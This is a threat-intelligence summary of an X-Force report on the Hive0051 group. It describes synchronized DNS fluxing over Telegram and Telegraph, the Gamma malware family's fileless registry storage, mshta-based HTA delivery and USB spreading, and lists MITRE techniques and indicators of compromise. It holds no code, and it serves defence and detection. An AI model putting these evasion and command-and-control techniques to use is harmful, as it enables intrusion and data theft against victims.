Threat Research

Hive0051’s large scale malicious operations enabled by synchronized multi-channel DNS fluxing

Securonix

Hive0051 is documented by X-Force as executing large-scale, synchronized multi-channel DNS fluxing to remap its C2 infrastructure across Telegram channels and Telegraph sites, enabling persistent operations and dynamic reallocation of victims across Gamma malware variants. The report details GammaLoad, GammaDrop, and GammaSteel, including fileless and registry-based techniques, USB spreading, and evolving C2 and obfuscation methods that indicate an elevated threat capability, with Ukraine-focused activity and ongoing infrastructure evolution. #Hive0051 #GammaLoad

Keypoints

  • Hive0051 uses a “multi-channel” fluxing approach to rapidly remap infrastructure across Telegram channels and Telegraph sites for synchronized DNS fluxing.
  • X-Force tracks multiple dedicated infrastructure clusters with Telegram channels, DNS apex domains, and Telegraph sites.
  • Hive0051 can graduate victims between C2 clusters by deploying multiple Gamma variant stages.
  • The threat group continually evolves malware with new obfuscation stages, USB-spread capabilities, and victim enumeration scripts.
  • The GammaLoad PowerShell variant has moved to a fileless approach, storing malicious code in the Windows registry, with GammaSteel exfiltration variants also observed.
  • The GammaLoad HTA/VBScript chain uses mshta.exe for remote HTA delivery, with phishing-like lure files and USB propagation.
  • C2 infrastructure uses fast-fluxing and hardcoded apex domains that rotate IPs 1–3 times per day, synchronized with multi-channel channels.

MITRE Techniques

  • [T1071.004] DNS – The operation uses fast-fluxing and multi-channel DNS fluxing with apex domains and Telegram/Telegraph as DNS channels: “the automated synchronized fluxing of dynamic DNS records across Telegram channels and Telegraph sites at scale” and “Telegram channels and Telegraph sites are essentially used as DNS servers”.
  • [T1071.001] Web Protocols – GammaLoad generates multiple HTTP requests with random integers and hardcoded paths, including custom headers; “The target URLs would often contain multiple random integers at specific locations” and “custom HTTP headers added to the requests.”
  • [T1059.005] VBScript – GammaLoad variants rely on VBScript-based execution paths for their dropper and payload delivery: “The downloaded .HTA is the VBScript-based GammaLoad installer.”
  • [T1218.005] Signed Binary Proxy Execution: Mshta – The installer downloads and executes remote HTA via mshta.exe: “downloads and execute another remote .HTA file via the windows binary mshta.exe.”
  • [T1059.001] PowerShell – GammaLoad/Steel variants leverage PowerShell for payloads, with fileless behavior and registry storage: “storing all necessary code in the registry, making it almost completely fileless.”
  • [T1047] Windows Management Instrumentation – GammaLoad uses a WMI query to resolve C2 IPs: “executing a WMI query” and “This runs the ping command against a specific domain.”
  • [T1091] Replication Through Removable Media – USB Spreader capability spreads via USB drives by recursively copying itself into subfolders: “spreads via USB drives… recursively into subfolders of connected USB drives.”
  • [T1112] Modify Registry – Fileless registry persistence observed, with GammaLoad’s code stored in the registry and used to re-inject payloads: “stored all malicious code dispersed in the Windows registry.”
  • [T1562.001] Impair Defenses – Detection of antivirus processes leads to alternative payload execution paths (e.g., QHActiveDefense.exe is sought and can influence payload execution): “the most recent variants also search for a specific process running on the host: QHActiveDefense.exe.”
  • [T1053.005] Scheduled Task – GammaDrop creates a new scheduled task after dropping its payload: “creates a new scheduled task after dropping its payload.”
  • [T1566.001] Phishing – Lure HTA/HTML files are used to trick victims into opening content: “lures designed to trick victims into opening it.”
  • [T1082] System Information Discovery – PowerShell reconnaissance collects system info, screenshots, and AV details: “PowerShell reconnaissance script” collects “System info” and “Anti-virus products.”
  • [T1113] Screen Capture – The reconnaissance script collects a screenshot: “Screenshot”
  • [T1027] Obfuscated/Compressed Files and Information – GammaLoad’s obfuscation stages and encoded payloads indicate obfuscation: “several encoded and hardcoded payloads.”

Indicators of Compromise

  • [Domain] antarcticos[.]ru, garibdo[.]ru – apex domains used for C2 DNS fluxing and domain history linking to rotated IPs.
  • [Domain] (additional apex domains associated with GammaLoad) – used in passive DNS data; “a large quantity of actor-controlled domain names resolves to one active C2 IP address.”
  • [File] layout.xml – GammaSteel uses a database file named “layout.xml” to store pseudo-hashes of exfiltrated files.
  • [Process] QHActiveDefense.exe – anti-virus process targeted/detected by newer GammaLoad variants.
  • [Process] mshta.exe – used to execute remote HTA payloads as part of the infection chain.
  • [File] .HTA – lure HTA files used in the infection chain to download and execute payloads.
  • [File] GammaLoad dropper/HTA variant – components described as VBScript-based installers and HTA downloaders.

Read more: https://securityintelligence.com/x-force/hive0051-malicious-operations-enabled-dns-fluxing/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint